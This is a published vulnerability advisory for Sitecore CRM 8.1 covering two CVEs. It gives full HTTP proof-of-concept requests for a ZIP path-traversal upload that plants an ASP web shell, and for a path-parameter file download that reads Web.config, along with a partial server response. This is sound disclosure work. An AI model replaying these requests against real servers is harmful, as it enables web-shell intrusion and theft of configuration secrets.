Vulnerability Disclosure - Sitecore CRM 8.1

CVE-2017-5965, CVE-2017-5966
Publish date: May 19 2017
Vendor: Sitecore
Product: Sitecore
Versions affected: 8.1 Rev 151207
Fixed version: None
Author: Chris McCurley

Authenticated Arbitrary File Upload via Sitecore Package Manager

This vulnerability was subject to a 90-day disclosure timeframe after disclosure to vendor in February 2017.

Using the Sitecore administrator web console, it is possible to upload files to any location on the web server file system. This is due to the way the package manager handles ZIP files, containing the to-be installed package.

To replicate this issue, create a zip file with a malicious filename with ..\..\Website\sitecore\ in the filename. The example below provides a zip file containing a file named ..\..\Website\sitecore\asp-shell.asp. The Unzip parameter must be set to 1 to automatically unzip the archive once uploaded. The Overwrite parameter can be used if overwriting system files, e.g. web.config.

POST /sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=<RANDOM-GUID> HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=
Cookie: <..snip..>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------14217273362068279630257947421
Content-Length: 2160

<..snip..>
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Unzip"

1
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Overwrite"

0
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326370957"; filename="asp-shell.zip"
Content-Type: application/zip

PK0[&Ió?Dõù’$..\..\Website\sitecore\asp-shell.aspUT    ÎW
ÎWuxö
RÛn›@}ç+¦+9²%ܤéC–RŒ+¶±€Êª©Â0n¨`¡»Kdûë;ËÅM#U}a™Ë9³gÎÚ&ã>ÜZFFR¤f,+pÀ-‹"æ)xGLj••ÜØŸî`'XE™f‡
Ó;¸¾µ¦Ÿ­ëéôƘLf†aŒ”a"²JMˆâ
é
ŒúûŸ˜¨!Û
n°ÜFføè­Vlô²Áÿ¢6^´óƒ§·Èr
Oò_¨–6ã?Ì®QaÑÖˆ@žÝõœÕ(©›ôSzy€a[²gÀØ¢ä€<GXTš‡0̽{fpu¹€ù€J—7qCQ»çy¯Ë
j
¿‰G+m‡\Ñÿ¬‹ûc˜Ž!5j¢‹N{çWÈ#<ª&?|‹ü8†EœK͡ѹ¸<mÏc´^Í
û‹?ÿFÇÂÖ'Ú]‡1(P½”©Ã¼ˆQ5ãU­@*t˜¢A
8IsšÌÎè|º
×8¯)gœNÌ`ö+ë}‘ºk¥EèK§sxô%8{n×yy&=AbA¡7ª—ô¾þUv5’fï
¦!¹Ú¼¥ììo¶5ºàsð„((k‚nHXS ¸*¹Ds'2
ý[ÒûòxR¦ØR™Æé}žL›róRb·†÷Í1G
:ú˝ÞÔ?¶ØVç‡ÕÚóPK0[&Ió?Dõù’..\..\Website\sitecore\asp-shell.aspUTÎWuxöPKjW
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326371057"; filename=""
Content-Type: application/octet-stream


-----------------------------14217273362068279630257947421--

After the file extraction has automatically completed, the web shell asp-shell.asp is accessible at https://sitecore-instance/sitecore/asp-shell.asp.

Authenticated Arbitrary File Download

A web application administrator can download arbitrary files which exist outside of the web root directory. By design, the file parameter is populated with a GUID that represents a specific file stored within the application. However, by providing a full system path to any file within this parameter, it is possible to download the specified file (assuming the Sitecore application is running with appropriate privileges).

GET /sitecore/shell/download.aspx?file=c:\full\path\to\file\Web.config HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/Applications/Reports/LogViewer
Cookie: <..snip..>
Connection: close

The HTTP response contains a portion of the requested web.config:

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24892
Content-Type: application/octet-stream; charset=utf-8
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="Web.config"
Content-Transfer-Encoding: binary
X-UA-Compatible: IE=Edge,chrome=1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
x-frame-options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="sitecore" type="Sitecore.Configuration.ConfigReader, Sitecore.Kernel" />
    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, Sitecore.Logging" />
  <section name="packageInstallation" type="Sitecore.Ship.Infrastructure.Configuration.PackageInstallationConfiguration, Sitecore.Ship.Infrastructure" /><section name="nancyFx" type="Nancy.Hosting.Aspnet.NancyFxSection" /></configSections>
  <connectionStrings configSource="App_Config\ConnectionStrings.config" />
  <appSettings>
  (...REDACTED...)